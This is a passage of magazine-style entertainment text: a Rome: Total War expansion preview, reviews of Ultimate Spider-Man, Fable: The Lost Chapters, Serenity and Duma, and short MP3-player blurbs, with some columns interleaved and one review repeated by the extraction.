putting the finishing touches on Rome: Total War -
Barbarian Invasion, the expansion pack to one of last
year's best games.
So what can we expect in Barbarian Invasion? Like the
Viking Invasion expansion for Medieval: Total War,
Barbarian Invasion depicts a very dark era in human
history: the slow collapse of the once-mighty Roman
Empire. As a result, the game is set hundreds of years after
the main campaign in the original game, and you'll have a
whole host of new barbarian tribes and nations to deal
with, such as the Ostrogoths. And keep in mind that the
Roman Empire had split into two, with the Byzantine
Empire setting up in Constantinople. Other additions to the
campaign game include 21 new buildings and
technologies.
There are some major new additions to the real-time battle
system as well. The biggest is the introduction of night
battles in the expansion. This means that you'll now see
formations in the distance by their torches, and you'll also
see cool lighting effects, such as the way a blazing fireball
briefly illuminates the ground as it flies through the air.
One big question that remains, though, is whether Creative
Assembly can retrofit night battles into the original Rome:
Total War. It's something that the company is looking into,
but it may require a lot of code changes it doesn't have
time for. Another new addition is that some types of units
now have limited swimming ability, so they'll be able to
wade into a river and even swim a short distance, giving
you some extra mobility on the battlefield, as well as a
way to escape entrapment. Of course, there are plenty of
new units to play with as well.
 Ultimate Spider-Man
The Good
Colorful, crisp cel-shading gives the game an awesome
comic book-inspired look; Some excellent boss fights;
Sharp voice acting and writing; Good story;
The Bad
Too many lame race and chase missions; Too few story
missions--remaining side missions aren't good enough to
warrant much replay value; Camera can sometimes make
combat a pain;
Serious webheads will get something positive out of
Ultimate Spider-Man, but they should do so with one of
the console versions, as the PC version of the game isn't
the ideal one.
Superhero games, like superhero movies, are steadily
starting to improve. Generally, it helps to base a game
more within a hero's given comic-book universe, as
opposed to directly upon any of the aforementioned films.
Compare the recent Incredible Hulk and X-Men games
based within the comic universe with the Fantastic Four
and Batman games based on films; the difference ought to
be clear. One franchise that's been stuck somewhere in the
middle over its last couple of installments is the Spider-
Man series. The first two games were based directly on the
megapopular films, and while neither could be called bad,
they weren't anything to write home about. Ultimate
Spider-Man is developer Treyarch's third attempt to make
a quality Spidey game, by way of developer Beenox,
which has ported the console game to the PC. Based on the
eponymous comic-book series, Ultimate Spider-Man is
certainly an improvement, adding a great sense of comic-
book style to the package and getting a whole host of
familiar Marvel characters into the mix. Unfortunately, it
also suffers from some of the familiarly flawed gameplay
of its predecessors, and it's a disappointingly short ride.
The Ultimate Spider-Man comic series is a reenvisioning of
the early days of Spider-Man lore. Here, Peter Parker is a
scrawny 15-year-old kid, granted his powers via the
infamous radioactive spider on a class field trip. The plot of
the Ultimate Spider-Man game doesn't spend much time
getting you up to speed with this, instead taking just a brief
minute or two to quickly show Parker's transformation into
the titular hero, as well as a bit of backstory about how he
and his childhood friend, Eddie Brock, stumble upon a
mysterious bioengineered suit that both their fathers had
apparently been working on before their deaths. As any
comic aficionado might assume, this is the suit that turns
Brock into the gruesome, tongue-lashing beast known as
Venom, and that's right where things pick up. The plot itself
is something of a disjointed affair; it's really more of an
excuse to squeeze as many relevant Marvel characters as
possible into the package. But it does a good job of
achieving this goal by including plenty of friendly faces such
as Wolverine and the Human Torch, as well as modern
versions of big-time villains such as Carnage, Electro, Green
Goblin, and, of course, Venom himself.
The story ends up a winner because it sticks so closely to its
comic-book roots--it's just too bad that there isn't very much
of it. To get through the entire story mode, it shouldn't take
you more than a half-dozen hours at most, and only about
five hours of that actually make up story missions. Ultimate
Spider-Man retains the sort of open-ended nature of Spider-
Man 2, letting you roam around the city of New York,
swinging your way to assorted side missions scattered about
the town. Most of these are basic checkpoint races, combat
missions in which your entire goal is to beat up a bunch of
gang members, and city events, which simply consist of
quick-rescue operations and breakups of bank robberies or
what have you. These missions aren't optional, though. They
appear that way at first, but you'll soon find that you have to
beat them to unlock more story missions--and in some cases,
you only unlock a cutscene and then have to go back out into
the city to beat more side missions to move on again.
Essentially, it feels like the developers quickly ran out of
story and hastily decided to make these missions required
play to pad out the length.
This padding really does kill some of the fun, because the
races, of which you'll be doing the most of early on in the
game, just aren't much fun. The combat tours and city events
make more sense, since Spidey's known for swooping down,
whooping some ass, and then swinging away into the sunset.
But these missions are far too repetitive, requiring you to
perform many of the same tasks over and over again until
you just don't want to do them anymore. This is doubly
unfortunate, because that's pretty much all there is to do once
the story mode is over with.
Fortunately, the story missions are a lot better, especially the boss
fights against the main villains, as well as the several sections
where you play as Venom. These fights are often challenging and
satisfying, though the final confrontation is a bit anticlimactic.
The game also leans a little too heavily on chase missions, where
your goal is, again, to race around the city, but with the twist of
having to stay within a specific distance of the opposing
character. It's an OK idea in theory, but there are too many of
these sequences, and it can sometimes be tough to get a good
bearing on where your target is, since there's no icon or anything
denoting where the target is--all you get is a sometimes unhelpful
arrow to point you in the right direction. Were there more of the
big, epic fights against the villains and more variety to the day-to-
day rescues and crime stoppage, Ultimate Spider-Man would be a
lot better off.
For those who played either of the last couple of Spider-Man
games, Ultimate Spider-Man features a couple of key gameplay
differences. For one, the combat is less clunky. Spider-Man
attacks with simple, effective combos that don't require much
more than a few bits of button mashing. You can still combine
Spidey's webs into the fray, but there's less you can actually do
with that. Venom's attacks are similarly simple, though they rely
more on whips of his tendrils and powerful killing moves, unlike
Spider-Man's quick and nimble maneuvers. Venom also has to
deal with an ever-draining life force, requiring him to
occasionally feed on enemies and helpless passersby. It's pretty
brutal, since you can basically feed on and kill any man, woman,
or child that happens into the brute's path. It also makes the
Venom sequences a lot easier, since most areas give him plenty
of people with which to quench his thirst. Spider-Man's portions
often lack health power-ups, which makes them a touch more
challenging--and sometimes, frustrating.
The methodology for getting around New York has also been
simplified, though with mixed results. Spider-Man's
webswinging mechanic requires a lot less effort on your part this
time around. You can't shoot multiple webs anymore; you're
effectively limited to single, standard-swinging webs, as well as a
web-boost shot that lets you leap great distances. Venom throws
all that webswinging by the wayside, opting to just leap hundreds
of feet in the air and occasionally use his tendrils to cover
distances quickly, not unlike in the web boost. While all of that's
well and good, jumping and swinging around the city just isn't as
interesting as it's been in the past. The simplification of the
webswing mechanic also seems to have slowed the overall feel of
your swinging, and it's just not all that thrilling to swing around
the city--which is pretty much the opposite of the case in the past
games. Admittedly, it is neat to jump around with Venom, since
he does handle differently from Spidey, but there aren't many
Venom sequences in the game. Incidentally, regardless of which
character you're playing as, you're going to want to use a good
dual analog gamepad for this game. Keyboard and mouse
controls are too unwieldy for both combat and webswinging.
The city of New York has also been scaled down here, but
that's not a detriment. Though there's less area to cover,
the areas themselves look a lot better. That's thanks mostly
to the game's entirely new art style, which uses a unique
cel-shading concept to give every character and set piece a
brightly colorful and sharp look. The character models are
so sharp looking, in fact, that they look like they've leapt
off a comic page--though perhaps that's because the game
goes to painstaking lengths to try to emulate the comic
book's style, creating multiple cutscenes that frame their
shots within the boxes of a comic. All this gives Ultimate
Spider-Man a wonderful sense of style that the previous
two games lacked. Admittedly, there are still a few
problems. The camera can get very uppity, especially in
tight spaces, and the PC version suffers from a bad frame
rate in a lot of spots, especially when you're webswinging.
Turning down effects makes no difference, nor does the
resolution. Parts of this game simply don't run well.
Ultimate Spider-Man features no celebrity voice acting,
but that's not a problem. The actors who portray the
characters do excellent work lending realistic and
sometimes appropriately goofy spins to these modernized
versions of classic characters. The dialogue is mostly quite
sharp, getting Spidey's snarky tone down pat and dealing
out a fair number of amusing one-liners. The only failing
of the dialogue is that in-game, Spider-Man's wisecracks
often repeat ad nauseam and get old quickly. The rest of
the audio features plenty of thwacks, whaps, and biffs, as
well as a fairly subdued soundtrack that seems to come in
and out at random intervals--not because it's broken or
anything, but it just isn't quite as well edited as it could
have been.
Ultimate Spider-Man is a better game than Treyarch's
previous efforts, but it still relies too heavily on the
novelty of swinging around the city and beating up the
same bad guys over and over again--a novelty made less
so by the simplification of both mechanics. It's especially
distressing that the developer was clearly able to put
together a solid story and some great boss fights, yet was
unable to cull together enough of them to make a great
game. Serious webheads will get something positive out of
Ultimate Spider-Man, but they should do so with one of
the console versions, as the PC version of the game isn't
the ideal one.
 Fable – The Lost Chapters

Fable is an imaginative game that's got enough remarkable,
unique moments in it to make it shine.
Some heroes are made when they rise to the occasion. Others
build their reputations over time. This latter case is the
subject of Fable: The Lost Chapters, a game in which you
get to vicariously experience the life of an archetypal fantasy
hero, and, in some respects, decide what eventually becomes
of him. Originally released for the Xbox last year, Fable was
one of the most highly anticipated games since the Xbox's
debut, and the latest title overseen by visionary game
designer Peter Molyneux since 2001's innovative Black &
White. Like that game, Fable invites you to solve problems
either by being good or by being evil, and to watch as the
effects of your decisions gradually take a noticeable toll on
your persona. Fable also features a number of novel
elements, such as how your hero's appearance gradually
changes with age, and how villagers respond differently to
him depending on his reputation, looks, and other factors.
These elements serve to significantly differentiate a game
that's actually pretty straightforward in terms of how it plays.
Beneath the surface, Fable is a well-put-together but standard
action adventure, primarily consisting of lots of basic combat
and running from point to point. Mind you, this is a
decidedly great game, all in all. Its most interesting, riskiest
features may lie at the fringes rather than at the core--but
they're there.
You begin Fable as a young child, and it's here that you're
introduced to the game's moral alignment system, its sense of
humor, and its dark edge--as well as its basic controls, which
will be mostly intuitive if you've played other third-person
perspective games recently. Your first order of business is to
earn a few gold pieces with which to purchase a birthday gift
for your sister. Whether you make the money by being
helpful or by making trouble is up to you. This initial
choose-your-own-adventure-style sequence is quite
impressive in the amount of freedom and variety it affords
you, and it suggests that Fable will constantly challenge you
to make moral decisions like the ones presented early on. For
example, will you help a little kid fend off a bully, or will
you join in on the bullying (or beat them both up)? These
decisions are so ethically basic that they're not at all difficult
to make, but it's still interesting to see how the game plays
out depending on what you do. You'll discover, though, that
Fable's introduction is not reflective of most of the game's
quests, which don't give you many choices. At any rate, soon
after you complete your first main task, something sinister
happens. Fortunately for your young character, he is saved
by an enigmatic man who transports him to the Heroes'
Guild, where he is to be trained to become an adventurer.

If you're familiar with the Xbox version of Fable, you'll find

that Fable: The Lost Chapters is essentially the same game,
though it's been tuned to work well for the PC and gains a
significant amount of new content. That is, the 12 months
since the release of the original apparently were well spent--
this game isn't any worse for wear today. The new Lost
Chapters storyline picks up immediately following the
conclusion of the original Fable's main quest, challenging
you to explore the treacherous north of the world of Albion,
and conquer a great threat lurking there. Featuring new
places to explore, new items to find, and new monsters to
fight, plus lots of new dialogue and cutscenes, the additional
content of The Lost Chapters is at least as good as that of the
original game, and it blends in seamlessly with the rest. It's
like getting an expansion pack together with the original
game, and The Lost Chapters helps address one of the
original Fable's problems, which is that it was quite short.
Fable veterans will of course need to play through the game
again in order to get to the new stuff, and the additional Cut to your hero's teenage years. At the Heroes' Guild, you're
quests amount to only a few more hours of gameplay, if you instructed on how to fight with melee weapons, a bow and
play straight through them. So while fans will surely enjoy arrow, and the powers of will--otherwise known as magic.
the new content, it isn't necessarily enough to justify getting All three of these fighting styles are relatively simple to use,
a second copy of the game. And if you're new to Fable, you'll but they work well. It's possible to lock onto nearby targets,
be better off for all the stuff that's been added. Other than the and you can switch between ranged and melee weapons
new content, Fable's controls and presentation have been easily. Melee combos are unleashed just by left-clicking
translated very well to the PC, to the point where the game repeatedly.
barely shows its console roots.
Some foes will block your attacks, but you can penetrate
their defenses either by maneuvering behind them or by
using a slower, stronger, unblockable strike that becomes
available after every few normal strikes. Archery works
similarly but is more methodical--the longer you press and
hold the attack button, the more fiercely you'll draw your
bow, resulting in significant damage per hit. Actually,
archery may not seem altogether practical in Fable. It can be
plenty effective, but since you'll be fighting most foes single-
handedly, and most of them will quickly close the distance
between you, toe-to-toe combat proficiency will seem like
the obvious first choice. A few flying enemies will require
you to put your unlimited arrows to good use, though.
Magic is unquestionably valuable in Fable. You'll start off
with a simple lightning attack, but you'll be able to spend
experience points on more than a dozen other different spells
(and upgrades to those spells). There are spells that do such
things as temporarily boost your strength and speed or
temporarily cause time to slow down all around you, letting
you easily outmaneuver foes. (Descriptions of these spells
make them sound very useful, and, in fact, they are.) Magic
is a little awkward to use at first: You need to hold down the
shift button to access your spells, then you have to use your
mousewheel to cycle through your available spells, if you
have more than a couple. But this is easy enough to get used
to, and worth getting used to sooner rather than later,
because magic helps make Fable's frequent battles pretty
easy, for better or worse.
You'll face a fairly diverse variety of foes during the course
of the game, some of which will seem reasonably smart.
Bands of bandits will fire on you with crossbows, switch to
swords as you approach, and attempt to flank you. Undead
will spring right out of the ground underneath your feet.
Creatures resembling werewolves will lunge at you from all
directions. Yet all these foes can be defeated handily in
groups, using the same types of tactics.
Fable's combat has a pretty good, solid feel to it as you
wallop your foes with swords, axes, maces, crossbows, and
more. But the combat isn't really a challenge once you
inevitably figure out a few key tricks. Items that quickly or
instantly restore your health will be available in copious
supply, letting you recover your energies in a pinch, even in
the midst of battle. You'll also probably end up hoarding
numerous "resurrection phials," which automatically restore
all your health should you be struck down. Once you learn
Fable's controls and figure out its fairly complex leveling-up
system, you'll have overcome its greatest challenges.
Of course, you won't be fighting hordes of foes while you're
still training at the Heroes' Guild. After the training is
complete, you're invited (rather awkwardly, via an onscreen
prompt) to continue on to your hero's adulthood, the time
during which the vast majority of Fable takes place. You can
get through the younger years in about an hour, and the rest
of the story is fairly brief and will take you maybe 10 or 12
hours on your first run, including the content of The Lost
Chapters--that's if you ignore a few available side quests,
though these don't pad the game's length much further.
Fortunately, Fable's world is sprinkled with little hidden
secrets--collectible special keys, talking demon doors
challenging you to open them up in some obscure fashion,
concealed treasure chests, and so forth--and these give the
game some additional lasting value. Ironically, though, there
isn't a clear incentive to play through the entire game over
from scratch once you've finished it the first time. Yet,
however you choose to spend your time with the game, you
should be able to squeeze a good 20 to 30 hours out of it
when all is said and done.
Fable's storyline, which is punctuated by an elegant sequence
of paintings showing your hero's latest exploits, is mostly
linear and starts slowly, after you get past the childhood
prologue. Past the halfway point, it actually becomes fairly
involved, since its few key characters become relatively
fleshed out. However, the hero himself remains silent during
all the proceedings, and all the moral decisions you've made
have little effect on what happens or how it happens. The
game does have multiple endings, depending on your
morality and the ultimate decisions you make, but each
version of the epilogue is very brief, and it's fairly easy to
see the numerous different alternatives without having to
play through the game from the beginning. This is partly
because your character's morality can be reversed just by
visiting one of two different locations in the game,
respectively devoted to a good and an evil god. All you need
to do is pay a hefty donation and your evil or good deeds will
be negated--and, toward the end of the game, you should
have plenty of money to spend. The inclusion of these
temples seems somehow unfortunate, as they can undermine
the deliberate process through which your character's nature
normally emerges.
Furthermore, the fact that you may continue exploring the
game's world of Albion even after you've finished the main
storyline means that you'll be able to see most of what Fable
has to offer without having to restart. Part of the appeal of
role-playing games that purport to let you live by the
consequences of your actions is that they offer significant
replay value. However, that's not necessarily true of Fable,
though the game does have lots of interesting peripheral
content to explore on your first go-round. The thing is, you
might miss it if you simply follow Fable's main quest, finish
it, and reckon you're done. If that happens, you'll have
experienced a quality action adventure game, but you will
have missed out on most of what makes Fable special.
It's fun to see your character develop as you play. You can
get a nice close-up look at the hero at any time at the touch
of a button, and you'll see him visibly age and transform in
other ways during his adulthood. It's possible to adorn your
hero with different hairstyles and tattoos--which don't have
much impact on gameplay (as you'd probably expect), but
may nonetheless cause certain villagers to respond to you
differently. Your clothing or armor can have a similar effect,
but the most interesting visual changes to the hero occur as a
result of your moral choices. Act evilly, and soon enough
you'll sprout horns, walk with a hunch, and gain blood-red
eyes; act like an angel and you'll gradually gain a divine aura
around you. There's a dramatic range of appearances
possible for your main character, and even though the
variations are mostly cosmetic, it's still very impressive.
Your character even becomes weathered and scarred from
constant battle.
There are other aspects to Fable's personalization system
worth noting. Your alignment will gradually give you access
to various social gestures--a nasty insult if you're evil, or an
apology if you're good, for instance. The Lost Chapters adds
more on top of the original game's options. Using these in
civilized settings yields results that are, at least, frequently
funny. Ultimately, there really isn't much to character
interaction in Fable. However, gesticulating in various ways
and watching as villagers react differently to you based on
your attire and reputation can be entertaining for a while. So
can a few different tavern games available at the drinking
establishments in Fable's handful of villages. The
extracurricular activities don't stop there: You may also get
married (and divorced), which is another fairly basic process
that leads to some amusing results; expect your spouse to
have some choice words for you whenever you change your
appearance. You may purposely or inadvertently commit all
kinds of different crimes while in town, from brandishing a
weapon to breaking windows to shoplifting, and the guards
will come looking for you if you do--you can pay a fine, flee,
or try to fight them. There are other nice little details here
and there. As day turns to night, villagers will light street
lamps and shutter their doors. Taverns are always bustling
with customers. The way the game's nonplayer characters act
and respond to you eventually becomes pretty transparent,
but messing around with them as though this were a virtual
ant farm can be rewarding.
For most of the structured gameplay, you'll be undertaking
quests that are the stuff of standard-issue fantasy. Rescue
missions, dungeon crawls, showdowns against powerful
foes, and all the other clichés make their appearances in
Fable. None of the quests take very long to accomplish,
thanks partly to your hero's convenient ability to teleport
around the world, as well as to the onscreen minimap that
always points you in the right direction. Fable's quests offer
a bit of varied challenge in how they allow you to "boast" for
additional rewards by agreeing to take on bigger risks.
Basically, you're able to take dares on certain quests, such as
vowing to go through a mission "naked" (just in your Union
Jack-emblazoned underpants, that is), or to slay every foe
from the mission's beginning to end, or to complete your
objectives in a certain period of time. These boasts can add
an extra bit of challenge and variety, but they aren't really
necessary. The penalty for a failed boast isn't severe, but if
you fail the quest altogether...you have no choice but to
restart that quest and keep trying until you succeed. It's
strangely disorienting to be required to restart a simple side
quest from the beginning when Fable is presumably a game
about living with the consequences of your actions. Again,
though, the game isn't hard, so the threat of having to replay
quests doesn't turn out to be much of a problem.
As you complete your missions and slay opponents, you'll gain
experience points, which you can spend to customize your The game's various environments, which include your standard
character and how he actually plays. This leveling-up system is fantasy trappings like forests, swamps, caverns, and
quite good, and unlike some of Fable's novelty elements, it graveyards, are dense with color and little atmospheric touches.
actually adds depth to the gameplay. Basically, you'll get to Weather effects look very real, and other effects for spells and
improve your character's various abilities within three different such are also great. But the best-looking aspect of the game is
pools: strength, skill, and will. Strength abilities influence your certainly the hero himself and his gradual metamorphosis into
melee power, toughness, and maximum health. Skill abilities whatever you're trying to turn him into. Watching your hero
affect your speed, archery, the prices you get from merchants, take shape over time is a one-of-a-kind experience that, in and
and your ability to sneak. Will abilities govern your maximum of itself, encourages spending lots of time playing Fable.
magic power and available spells. Interestingly, you gain
experience points in each of these three categories separately, as The same is absolutely true of the audio, which is quite
you fight using melee, archery, and magic, respectively. You also possibly the best part of the game. A beautiful classical-style
earn a fourth, general type of experience on top of that, which can orchestral score plays pleasantly throughout the game,
be spent on any of the three ability sets. All abilities within each changing its tone and mood effortlessly to fit each different
of the three pools are available right from the get-go, and it's a lot type of setting and situation. Ambient sound effects match or
to take in. Fortunately, some helpful text and voice-over clearly even surpass the richness of the graphics. The game's voice
explains how each option may be useful to you. acting (all of it is British) is of very high quality overall, and
there's a ton of spoken dialogue to be heard. You'll
Though this system works very well, it discourages pure occasionally hear some repeated lines as you wander through
specialization. You might start out hoping to become the best towns, and this is really the only strike against a game whose
possible fighter or magic user...but eventually, you'll find sound is amazingly well done.
yourself having to spend exponentially more experience for
limited gains in your chosen field, versus spending relatively Fable is an imaginative game that's got enough remarkable,
small quantities of experience points to gain proficiency in new unique moments in it to make it shine. That many of these
skills. So you're almost certainly going to wind up as some sort of moments happen to be good for a laugh is all the better. It's
hybrid fighter/archer/wizard, though you'll still probably lean true that the game's high points are not always frequent--its
toward specific sets of skills, of which there are numerous viable ambitions are evident but not always fulfilled, and the
combinations. pervasively playful spirit of the game sometimes is mired by
convention. These trespasses are more than excusable, though.
The sum total of Fable's elements is a decidedly interesting mix Regardless of how much time you ultimately spend playing
that invites, and often rewards, exploration and experimentation. Fable, you're not likely to forget the experience for a long
That's great, but for what it's worth, the game doesn't entirely while.
succeed at making you feel like you are the hero. The epic
premise doesn't quite translate into an epic experience. This is
mostly because the form and structure of the gameworld feel
contrived. Fable consists of a sequence of relatively small,
winding, interconnected maps, separated by brief but noticeable
load times. The hero himself has no personality (and never
speaks, except for a few short, gruff phrases when you make him
emote), and the game's cookie-cutter nonplayer characters, while
often amusing, don't come across as lifelike. Fable's juxtaposition
of cheeky humor and surprisingly serious story themes also
seems odd, as the humor tends to overshadow aspects of the story
that otherwise could have seemed much more dramatic, had the
game maintained a more even tone. All of this makes the world
of Fable seem very much like a sandbox (in which your
imagination will be the key to your enjoyment) rather than a fully
realized and cohesive fantasy setting--the kind that really draws
you in and makes you feel like a part of it. In Fable, you'll often
feel more like the director than like the star of the show.

Fable is excellent from a technical standpoint, featuring highly

detailed visuals brought to life by soft, colorful ambient lighting,
which gives the entire game an appropriately dreamlike, wispy
look. Little details are everywhere, and character animations are
nicely exaggerated, making the inhabitants of Fable appear larger
than life.
 Serenity
Joss Whedon's intimate sci-fi epic "Serenity" rockets
straight out of the universe of second chances.
Whedon seems to have cornered this market, having
penned 1992's lackluster "Buffy the Vampire Slayer"
feature, only to resurrect it five years later as the cult TV
phenomenon starring Sarah Michelle Gellar.
"Serenity" takes the reverse course. It's the sequel to
Whedon's groundbreaking "Firefly" TV series, which
was mishandled (episodes aired out-of-order), then
unceremoniously dumped by the suits at Fox. Fans
protested and DVD sales of the series helped Whedon
push "Firefly" through the black hole of cancellation to
the silver screen.
And oh, what a movie it is. "Serenity" is a brash, funny,
action-packed bit of sci-fi ecstasy—and a giant
raspberry to the execs who let "Firefly" fall out of the
sky.
But you needn't have seen a single episode to be blown
away by "Serenity." Its first five minutes plunges
audiences into Whedon's esoteric universe of outlaws
living on the fringe of the Wild West-style frontier of
space.
The movie begins with Capt. Malcolm "Mal" Reynolds
(Nathan Fillion) struggling to keep the crew of
spaceship Serenity together. Taking on fugitive siblings
Simon (Sean Maher) and telepathic River (Summer
Glau) has caused considerable strain on Serenity's
fractured crew of smugglers—mostly because the
unstable, unpredictably violent River is an escaped
government she-weapon.
The Alliance, Whedon's totalitarian galactic state, wants
River back—even at the cost of starting a small
interplanetary war. Actor Chiwetel Ejiofor plays
Serenity's deadly nemesis, an unnamed "operative" with
steely resolve and murderous methods. The calm, polite
Ejiofor is the greatest asset in Whedon's war of
ideologies.
"[When] I start a fighting a war, I guarantee you'll see
something new," Reynolds says.
It's a promise Whedon keeps.
Outer space as the new western frontier isn't anything
new. In fact, when Gene Roddenberry was trying to sell
"Star Trek" to networks, he pitched it as "'Wagon Train'
to the stars." Whedon takes the metaphor even further.
Characters talk in an artificial "OK Corral" vernacular
(people are always "fixin'" to do something), pausing
only to swear in Chinese. Mal's love interest, Inara
(Morena Baccarin), works as a Companion, a revered
class of intergalactic saloon courtesan. Space battles are
at a minimum, since Serenity doesn't have any guns. No
aliens. No transporter beams. No phasers on stun.
"Firefly" was never about the techie stuff, and unlike its
peers, "Serenity" isn't designed to sell action figures
(although, yes, there are toys). Instead, it's a character-
driven series about fundamental human issues: love, the
morality of genetic engineering, big government, etc.
Even so, "Serenity's" special effects look remarkable.
Instead of offering intricately designed space fights on a
static screen, the action sequences look as if they were
captured on a hand-held camera, often out-of-focus and
blazingly fast, much like the human eye sees.
But Whedon's primary allegiance remains with the
human heart. Though the Inara/Mal relationship gets
short shrift (mostly due to screen time allotted them, one
suspects), pixieish mechanic Kaylee (Jewel Staite)
finally reveals her twitterpation with Simon. Second-in-
command Zoe (Gina Torres), her pilot husband Wash
(Alan Tudyk) and mercenary Jayne (Adam Baldwin)
also faces major changes—but keeping the Serenity clan
intact remains the central theme.
"Serenity" carries an unexpectedly high body count and
is far nastier than audiences may bargain for. Mal's face-
off with the Alliance's operative feels a tad unsatisfying,
if only because it defies convention. Then again,
Whedon has made a career thumbing his nose as
convention.
With "Serenity," Whedon has his cake and eats it too—
wrapping up most of the major plots and themes of
"Firefly," while leaving the door open (just a crack) for a
new series—maybe even another film. This second
chance deserves a third.
'Serenity'

Written and directed by Joss Whedon; cinematography by Jack N. Green; production design by Barry
Chusid; music by David Newman; edited by Lisa Lassek; produced by Barry Mendel. A Universal
Pictures release; opens Friday. Running time: 1:59. MPAA rating: Rated PG-13 (for sequences of intense
violence and action, and some sexual references).

Capt. Malcolm "Mal" Reynolds - Nathan Fillion

Zoe - Gina Torres

Hoban "Wash" Washburn - Alan Tudyk

Jayne Cobb - Adam Baldwin

Kaylee Frye - Jewel Staite

Dr. Simon Tam - Sean Maher

River Tam - Summer Glau

Shepherd Book - Ron Glass

Mr. Universe - David Krumholtz

The Operative - Chiwetel Ejiofor

 Duma
The 12-year-old boy helped raise the cheetah, after he and
his father found it as a cub. The boy, named Xan, lives on
a farm in South Africa, where he and Duma form a strong
bond, but their friendship cannot last forever. An
emergency forces the family to move to the city, and Xan
realizes that Duma, now fully grown, should be returned to
the wild.
There might be reasonable ways of doing that. Perhaps
Xan (Alex Michaeletos) could call the animal welfare
people. Instead, without telling his mother (Hope Davis),
he decides to personally return Duma to the wilderness.
There is a scene of the cheetah riding in the sidecar of an
old motorcycle, which Xan drives into the desert. It could
be a cute scene, maybe funny, in a different kind of movie,
but "Duma" takes itself seriously, and is not a cute
children's story but a grand tale of adventure.
Xan has courage but not a lot of common sense. He is
headed into the Kalahari Desert, where to get lost is,
usually, to die. Of course the motorcycle runs out of gas.
Then he meets another wanderer in the desert, named
Ripkuna (Eamonn Walker), who once worked in the mines
of Johannesburg but now prefers to work alone, perhaps
for reasons we would rather not know. He warns Xan of
the dangers ahead ("That is a place of many teeth, my
friend; that is a place to die"). He has the knowledge to
save the boy and the cheetah. But what is his agenda? The
12-year-old boy helped raise the cheetah, after he and his
father found it as a cub. The boy, named Xan, lives on a
farm in South Africa, where he and Duma form a strong
bond, but their friendship cannot last forever. An
emergency forces the family to move to the city, and Xan
realizes that Duma, now fully grown, should be returned to
the wild.
There might be reasonable ways of doing that. Perhaps
Xan (Alex Michaeletos) could call the animal welfare
people. Instead, without telling his mother (Hope Davis),
he decides to personally return Duma to the wilderness.
There is a scene of the cheetah riding in the sidecar of an
old motorcycle, which Xan drives into the desert. It could
be a cute scene, maybe funny, in a different kind of movie,
but "Duma" takes itself seriously, and is not a cute
children's story but a grand tale of adventure.
Xan has courage but not a lot of common sense. He is
headed into the Kalahari Desert, where to get lost is,
usually, to die. Of course the motorcycle runs out of gas.
Then he meets another wanderer in the desert, named
Ripkuna (Eamonn Walker), who once worked in the mines
of Johannesburg but now prefers to work alone, perhaps
for reasons we would rather not know. He warns Xan of
the dangers ahead ("That is a place of many teeth, my
friend; that is a place to die"). He has the knowledge to
save the boy and the cheetah. But what is his agenda?
"Duma" is an astonishing film by Carroll Ballard, the director
who is fascinated by the relationship between humans, animals
and the wilderness. He works infrequently, but unforgettably.
Perhaps you have seen his "The Black Stallion" (1979), about a
boy and a horse who are shipwrecked, and begin a friendship that
leads to a crucial horse race. Or his "Never Cry Wolf" (1983),
based on the Farley Mowat book about a man who goes to live in
the wild with wolves. Or the wonderful "Fly Away Home"
(1996), about a 13-year-old girl who solos in an ultralight
aircraft, leading a flock of pet geese south from Canada.
The wolf and geese stories were, incredibly, based on fact. So,
perhaps even more incredibly, is "Duma." There really was a boy
and a cheetah, written about in the book How It Was With
Dooms, by Xan Hopcraft and his mother, Carol Cawthra
Hopcraft. Even more to the point: This movie shows a real boy
and a real cheetah (actually, four cheetahs were used). There are
no special effects. The cheetah is not digitized. What we see on
the screen is what is happening, and that lends the film an eerie
intensity. Animals are fascinating when they are free to be
themselves; when they are manipulated by CGI into cute little
actors who behave on cue, what's the point?
How is this film possible? There are shots showing a desert
empty to the horizon, except for the boy and the cheetah. No
doubt handlers are right there out of camera range, ready to act in
an emergency, but it is clear the filmmakers and the boy trust the
animals they are working with.
True, cheetahs are a special kind of big cat; Wikipedia informs
us, "Because cheetahs are far less aggressive than other big cats,
cubs are sometimes sold as pets." Yes, but a pet that can, as Xan
tells his dad (Campbell Scott) "outrun your Porsche." A pet that
is a carnivore. It would seem that Duma can be trusted, but as W.
G. Sebald once observed, "Men and animals regard each other
across a gulf of mutual incomprehension."
And if Duma can be trusted, can the African man, Ripkuna? Where is he leading them? He must know that a reward has
been posted for the missing boy, and that a tame cheetah can be sold for a good amount of money. While these questions
circle uneasily in our minds, "Duma" creates scenes of wonderful adventure. The stalled motorcycle is turned into a wind-
driven land yacht. A raft trip on a river involves rapids and crocodiles. The cheetah itself plays a role in their survival.
And the movie takes on an additional depth because Xan is not a cute one-dimensional "family movie" child, and
Ripkuna is freed from the usual cliches about noble and helpful wanderers. These are characters free to hold surprises in
the real world.

Watching this movie, absorbed by its storytelling, touched by its beauty, fascinated by the bond between the boy and the
animal, I was also astonished by something else: The studio does not know if it is commercial! The most dismal
stupidities can be inflicted on young audiences, but let a family movie come along that is ambitious and visionary, and
distributors lose confidence. It's as if they fear some movies are better than the audience can handle.

"Duma" has had test runs in the Southwest. Now it opens in Chicago, and the box office performance here will decide its
fate. That is not a reason to see it. Moviegoers do not buy tickets to "support" a movie, nor should they. The reason to see
"Duma" is that it's an extraordinary film, and intelligent younger viewers in particular may be enthralled by it.
Tux iPod Stand

Astone Allure Series of Stainless

Steel MP3 Players

The Plasticsmith raises the art of fetish to new level

with their Tux iPod stand. This lucite beastie comes in
two flavors, Tilt and Upright, and accentuates your
iPod like nothing else in the world, aside from a silk
scarf and a beret.

Sony Bean

Check out this high quality stainless steel construction

The Sony Bean, (named so because it is shaped like a
bean) is a small flash MP3 player with a one-line
OLED screen. It is described by Sony Corp. as
“Playful, Powerful, and Compact.”
It plays MP3s & Sony’s Atrac3plus format. It has a
pop-up USB connector. Sony claims that it can run for
50 hours on one charge. The beans are available in
different flavors or colours: Tropical Ice (Blue), Cotton
Candy (Pink), Licorice (Black) and Drowned Cadaver
(White). There will even be a model with a built-in FM
tuner. And it claims that it support’s Sony’s
CONNECT service.
MP3 players. It plays MP3, WMA & WMA DRM, has
a FM Radio, Voice Recording and mass data storage
function. It even has MP3 Line-In Encoding for
recording from external audio sources. You can listen
and record FM radio simultaneously. It is USB2.0-
compliant, comes in a stainless steel/black casing, and
will be available in 256, 512 MB and 1GB capacities.
There are three different versions of the players & the
main differences between the three versions are... their
shape. One of them is shaped like a dull rectangle,
another like a circle, & the third one as a triangle.
Known not are prices yet.
Star Wars-branded Alienware PCs
Alienware has created a Star Wars-branded desktop
system. The special Aurora models are available in
